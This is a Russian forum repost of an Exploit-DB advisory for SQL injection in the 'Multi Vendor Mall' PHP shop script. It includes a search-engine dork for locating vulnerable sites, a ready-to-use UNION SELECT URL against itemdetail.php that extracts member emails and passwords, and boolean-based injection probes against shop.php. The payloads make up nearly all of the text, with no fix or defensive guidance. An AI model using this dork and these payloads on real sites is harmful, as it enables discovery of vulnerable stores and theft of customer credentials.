- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12755
- Проверка EDB
-
- Пройдено
- Автор
- COBRA_21
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-05-26
Код:
-------------------------------------------------------------------------------------------
Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Script Home: http://www.multishopcms.com
Dork: pages.php?id= "Multi Vendor Mall"
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/itemdetail.php?itemid=-39 union select 0,1,2,3,4,5,group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+members_tbl--
http://localhost/[path]/shop.php?storeid=77 and 1=2
http://localhost/[path]/shop.php?storeid=77 and 1=1
-------------------------------------------------------------------------------------------- Источник
- www.exploit-db.com
